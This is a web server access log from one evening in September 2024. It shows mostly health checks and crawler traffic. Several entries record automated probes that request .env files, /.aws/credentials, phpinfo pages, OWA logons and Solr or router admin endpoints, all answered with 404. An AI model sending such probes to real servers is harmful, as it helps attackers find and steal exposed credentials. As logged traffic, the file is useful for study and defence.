195.56.55.225 - - [02/Sep/2024:19:34:56 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:19:35:10 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.ipoly.zpok.hu/owa/ HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:35:10 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:19:36:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:39:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:41:05 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:43:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.84.89.2 - - [02/Sep/2024:19:43:27 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/6.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Inspici (www.inspici.com)"
83.97.73.245 - - [02/Sep/2024:19:44:01 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
83.97.73.245 - - [02/Sep/2024:19:44:03 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:19:45:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
52.70.240.171 - - [02/Sep/2024:19:47:03 +0200] "GET /ovis/nozone.html HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
149.50.103.48 - - [02/Sep/2024:19:47:05 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:19:47:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:49:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:19:49:28 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
164.92.173.105 - - [02/Sep/2024:19:49:37 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
164.92.173.105 - - [02/Sep/2024:19:49:37 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
164.92.173.105 - - [02/Sep/2024:19:49:37 +0200] "GET /odinhttpcall1725299377 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.173.105 - - [02/Sep/2024:19:49:37 +0200] "POST /sdk HTTP/1.1" 404 279 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.173.105 - - [02/Sep/2024:19:49:37 +0200] "GET /evox/about HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.173.105 - - [02/Sep/2024:19:49:37 +0200] "GET /HNAP1 HTTP/1.1" 404 281 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
164.92.173.105 - - [02/Sep/2024:19:49:38 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
164.92.173.105 - - [02/Sep/2024:19:49:38 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
165.232.68.246 - - [02/Sep/2024:19:49:38 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
164.90.210.55 - - [02/Sep/2024:19:49:38 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 281 "-" "Go-http-client/1.1"
164.90.178.150 - - [02/Sep/2024:19:49:38 +0200] "\x16\x03\x01" 501 - "-" "-"
165.227.171.205 - - [02/Sep/2024:19:49:38 +0200] "GET /v2/_catalog HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
165.232.68.246 - - [02/Sep/2024:19:49:38 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 292 "-" "Go-http-client/1.1"
164.90.178.150 - - [02/Sep/2024:19:49:38 +0200] "\x16\x03\x01" 501 - "-" "-"
64.225.107.32 - - [02/Sep/2024:19:49:38 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
164.90.178.150 - - [02/Sep/2024:19:49:38 +0200] "\x16\x03\x01" 501 - "-" "-"
159.65.125.100 - - [02/Sep/2024:19:49:39 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
52.76.71.100 - - [02/Sep/2024:19:49:44 +0200] "GET /favicon.ico HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
212.95.49.158 - - [02/Sep/2024:19:50:27 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.simonyi.zpok.hu/owa/ HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:19:50:28 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
185.191.126.213 - - [02/Sep/2024:19:51:00 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:19:51:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:19:51:51 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:19:53:25 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:55:28 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:19:57:31 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
35.93.137.118 - - [02/Sep/2024:19:58:32 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:19:59:34 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:01:37 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:03:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:05:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.249.64.64 - - [02/Sep/2024:20:07:29 +0200] "GET /www.brettonwoodsproject.org/dbn/dbn2.pdf HTTP/1.1" 404 318 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
195.56.55.225 - - [02/Sep/2024:20:07:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
179.43.133.242 - - [02/Sep/2024:20:07:46 +0200] "GET /sendgrid.env HTTP/1.1" 404 288 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:46 +0200] "GET /.env_example HTTP/1.1" 404 288 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /core/.env HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /app/.env HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /laravel/.env HTTP/1.1" 404 288 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /.aws/credentials HTTP/1.1" 404 292 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /web/.env HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /crm/.env HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /backend/.env HTTP/1.1" 404 288 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /local/.env HTTP/1.1" 404 286 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /api/.env HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /admin/.env HTTP/1.1" 404 286 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /application/.env HTTP/1.1" 404 292 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /info.php HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /phpinfo.php HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /phpinfo HTTP/1.1" 404 283 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /infos.php HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 293 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /local-phpinfo.php HTTP/1.1" 404 293 "-" "Go-http-client/1.1"
179.43.133.242 - - [02/Sep/2024:20:07:47 +0200] "GET /info HTTP/1.1" 404 280 "-" "Go-http-client/1.1"
89.190.156.137 - - [02/Sep/2024:20:09:41 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:20:09:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
51.222.253.7 - - [02/Sep/2024:20:10:09 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
87.236.176.91 - - [02/Sep/2024:20:11:28 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
195.56.55.225 - - [02/Sep/2024:20:11:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:20:12:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:20:12:07 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:20:12:46 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:20:12:47 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:20:13:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
159.65.125.100 - - [02/Sep/2024:20:13:57 +0200] "\x16\x03\x01\x01$\x01" 501 - "-" "-"
205.210.31.133 - - [02/Sep/2024:20:14:54 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [02/Sep/2024:20:15:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:20:17:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.zpok.hu/owa/ HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:20:17:23 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:20:18:02 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:20:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:22:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
45.148.10.251 - - [02/Sep/2024:20:23:54 +0200] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 302 "-" "Hello"
195.56.55.225 - - [02/Sep/2024:20:24:14 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
93.174.93.12 - - [02/Sep/2024:20:25:12 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4"
149.50.103.48 - - [02/Sep/2024:20:25:51 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:20:26:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
93.174.93.12 - - [02/Sep/2024:20:26:44 +0200] "GET / HTTP/1.0" 200 1155 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4"
195.56.55.225 - - [02/Sep/2024:20:28:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:30:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:32:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:34:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:36:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
80.99.173.182 - - [02/Sep/2024:20:37:03 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:20:38:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:40:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:42:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
149.50.103.48 - - [02/Sep/2024:20:43:35 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:20:44:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:20:45:35 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.meteor.zpok.hu/owa/ HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:20:45:35 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:20:46:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.234 - - [02/Sep/2024:20:47:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [02/Sep/2024:20:48:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:20:50:59 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
3.224.220.101 - - [02/Sep/2024:20:52:39 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
3.224.220.101 - - [02/Sep/2024:20:52:40 +0200] "GET /pgt/ HTTP/1.1" 404 277 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
195.56.55.225 - - [02/Sep/2024:20:53:03 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:20:55:01 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:20:55:06 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
89.190.156.137 - - [02/Sep/2024:20:57:00 +0200] "GET / HTTP/1.0" 200 1155 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
195.56.55.225 - - [02/Sep/2024:20:57:09 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:20:58:29 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "POST /sdk HTTP/1.1" 404 279 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "GET /odinhttpcall1725303527 HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "GET /HNAP1 HTTP/1.1" 404 281 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "GET /evox/about HTTP/1.1" 404 286 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "GET / HTTP/1.0" 200 1155 "-" "-"
159.89.107.111 - - [02/Sep/2024:20:58:47 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
159.65.121.249 - - [02/Sep/2024:20:58:47 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 298 "-" "Go-http-client/1.1"
161.35.202.32 - - [02/Sep/2024:20:58:47 +0200] "GET /v2/_catalog HTTP/1.1" 404 287 "-" "Go-http-client/1.1"
159.89.7.16 - - [02/Sep/2024:20:58:47 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.201.130 - - [02/Sep/2024:20:58:47 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 297 "-" "Go-http-client/1.1"
164.90.220.56 - - [02/Sep/2024:20:58:47 +0200] "\x16\x03\x01" 501 - "-" "-"
165.22.93.250 - - [02/Sep/2024:20:58:47 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 281 "-" "Go-http-client/1.1"
159.89.7.117 - - [02/Sep/2024:20:58:47 +0200] "\x16\x03\x01\x01$\x01" 501 - "-" "-"
159.65.121.249 - - [02/Sep/2024:20:58:47 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 292 "-" "Go-http-client/1.1"
164.90.220.56 - - [02/Sep/2024:20:58:47 +0200] "\x16\x03\x01" 501 - "-" "-"
164.90.220.56 - - [02/Sep/2024:20:58:47 +0200] "\x16\x03\x01" 501 - "-" "-"
195.56.55.225 - - [02/Sep/2024:20:59:12 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
134.255.11.58 - - [02/Sep/2024:21:00:27 +0200] "-" 408 - "-" "-"
195.56.55.225 - - [02/Sep/2024:21:01:15 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.191.126.213 - - [02/Sep/2024:21:02:40 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:21:03:18 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.16.39.118 - - [02/Sep/2024:21:04:04 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [02/Sep/2024:21:05:21 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:07:24 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
128.14.153.206 - - [02/Sep/2024:21:08:17 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
195.56.55.225 - - [02/Sep/2024:21:09:27 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:11:30 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:13:33 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:15:36 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:17:40 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
147.185.132.61 - - [02/Sep/2024:21:17:42 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [02/Sep/2024:21:19:43 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
143.110.171.80 - - [02/Sep/2024:21:21:07 +0200] "\x16\x03\x01\x01\xfc\x01" 501 - "-" "-"
143.110.171.80 - - [02/Sep/2024:21:21:12 +0200] "\x16\x03\x01\x01\xfc\x01" 501 - "-" "-"
195.56.55.225 - - [02/Sep/2024:21:21:46 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
40.77.167.108 - - [02/Sep/2024:21:22:16 +0200] "GET /robots.txt HTTP/1.1" 404 283 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.58 - - [02/Sep/2024:21:22:26 +0200] "GET /maxigas/pick/painting/gargoyle-notre_dame.jpg HTTP/1.1" 404 318 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
182.43.70.143 - - [02/Sep/2024:21:23:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
182.43.70.143 - - [02/Sep/2024:21:23:20 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
139.28.254.51 - - [02/Sep/2024:21:23:28 +0200] "GET / HTTP/1.1" 200 1155 "-" "-"
195.56.55.225 - - [02/Sep/2024:21:23:49 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
66.102.8.78 - - [02/Sep/2024:21:25:49 +0200] "GET / HTTP/1.1" 200 1155 "-" "FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)"
195.56.55.225 - - [02/Sep/2024:21:25:52 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
185.16.39.118 - - [02/Sep/2024:21:27:48 +0200] "GET / HTTP/1.1" 200 1155 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.56.55.225 - - [02/Sep/2024:21:27:55 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
212.95.49.158 - - [02/Sep/2024:21:29:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.wwf.zpok.hu/owa/ HTTP/1.1" 404 297 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
212.95.49.158 - - [02/Sep/2024:21:29:29 +0200] "GET /owa/auth/logon.aspx?replaceCurrent=1&url=http%3A//owa.mail.zpok.hu/owa/ HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
195.56.55.225 - - [02/Sep/2024:21:29:58 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
23.22.35.162 - - [02/Sep/2024:21:30:19 +0200] "GET /cikk.php3?id_article=486 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot)"
198.235.24.100 - - [02/Sep/2024:21:30:56 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [02/Sep/2024:21:32:01 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:34:04 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
195.56.55.225 - - [02/Sep/2024:21:36:07 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
198.235.24.68 - - [02/Sep/2024:21:38:04 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [02/Sep/2024:21:38:10 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
205.210.31.225 - - [02/Sep/2024:21:40:09 +0200] "GET / HTTP/1.1" 200 1155 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.56.55.225 - - [02/Sep/2024:21:40:13 +0200] "GET /test.html HTTP/1.1" 200 56 "-" "monit/4.6"
